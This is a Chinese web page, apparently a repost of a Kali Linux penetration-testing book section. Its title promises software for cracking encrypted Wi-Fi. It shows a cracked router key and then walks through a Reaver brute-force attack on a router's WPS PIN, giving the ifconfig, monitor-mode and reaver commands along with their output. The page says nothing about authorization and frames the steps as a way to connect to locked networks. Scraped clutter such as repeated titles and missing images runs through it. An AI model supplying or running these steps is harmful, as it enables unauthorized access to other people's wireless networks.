专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上( 四 )

(7)破解密码 。执行命令如下所示:

专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

从输出的信息中可以看到无线路由器的密码已经成功破解 。在KEY FOUND提示的右侧可以看到密码已被破解出 , 为daxueba , 破解速度约为500.88 k/s 。
9.2.3 攻击WPS(Wi-Fi Proteced Setup)WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准 。该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病 。因为通常用户往往会因为设置步骤太麻烦 , 以至于不做任何加密安全设定 , 从而引起许多安全上的问题 。所以很多人使用WPS设置无线设备 , 可以通过个人识别码(PIN)或按钮(PBC)取代输入一个很长的密码短语 。当开启该功能后 , 攻击者就可以使用暴力攻击的方法来攻击WPS 。本小节将介绍使用各种工具攻击WPS 。
现在大部分路由器上都支持WPS功能 。以前路由器有专门的WPS设置 , 现在的路由器使用QSS功能取代了 。这里以TP-LINK型号为例 , 介绍设置WPS功能 , 如图9.15所示 。如果使用WPS的PBC方式 , 只需要按下路由器上的QSS/RESET按钮就可以了 。
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

图9.15 设置WPS
从该界面可以看到QSS功能已开启 , 可以看到当前的PIN码是04588306 。这里可以重新生成新的PIN码 , 或者恢复初始PIN码 。
【实例9-1】使用Reaver破解WPS 。具体操作步骤如下所示 。
(1)插入无线网卡 , 使用ifconfig命令查看无线网卡是否已经正确插入 。执行命令如下所示:
root@Kali:~# ifconfigeth0Link encap:Ethernet HWaddr 00:19:21:3f:c3:e5inet addr:192.168.5.4 Bcast:192.168.5.255 Mask:255.255.255.0inet6 addr: fe80::219:21ff:fe3f:c3e5/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:10541 errors:0 dropped:0 overruns:0 frame:0TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB)loLink encap:Local Loopbackinet addr:127.0.0.1 Mask:255.0.0.0inet6 addr: ::1/128 Scope:HostUP LOOPBACK RUNNING MTU:65536 Metric:1RX packets:296 errors:0 dropped:0 overruns:0 frame:0TX packets:296 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:17760 (17.3 KiB) TX bytes:17760 (17.3 KiB)从输出的信息中可以看到 , 只有一个以太网接口eth0 。这是因为无线网卡可能没有启动 , 首先来启动该无线网卡 。执行命令如下所示:
root@Kali:~# ifconfig wlan0 up执行以上命令后 , 没有任何信息输出 。此时再次执行ifconfig命令 , 查看无线网络是否已启动 , 如下所示:
root@Kali:~# ifconfig......wlan0Link encap:Ethernet HWaddr 08:10:76:49:c3:cdUP BROADCAST MULTICAST MTU:1500 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)看到以上输出信息 , 则表示无线网卡已成功启动 , 其网络接口为wlan0 。
(2)启动无线网卡为监听模式 。执行命令如下所示:
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

从输出的信息中 , 可以看到monitor mode enabled on mon0 , 表示无线网卡已启动监听模式 。在以上信息中 , 还可以看到无线网卡的芯片级驱动类型 。其中 , 该网卡的芯片为Ralink , 默认驱动为rt2800usb 。
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图
专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

文章插图

注意:执行以上命令启动监听模式 , 一定要确定正确识别无线网卡的芯片和驱动 。否则 , 该无线网卡可能导致攻击失败 。
(3)攻击WPS 。执行命令如下所示:
root@kali:~# reaver -i mon0 -b 14:E6:E4:AC:FB:20 -vvReaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@ tacnetsol.com>[+] Waiting for beacon from 14:E6:E4:AC:FB:20[+] Switching mon0 to channel 1[+] Switching mon0 to channel 2[+] Switching mon0 to channel 3[+] Switching mon0 to channel 11[+] Switching mon0 to channel 4[+] Switching mon0 to channel 5[+] Switching mon0 to channel 6[+] Switching mon0 to channel 7[+] Associated with 8C:21:0A:44:09:F8 (ESSID: yztxty)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK......

推荐阅读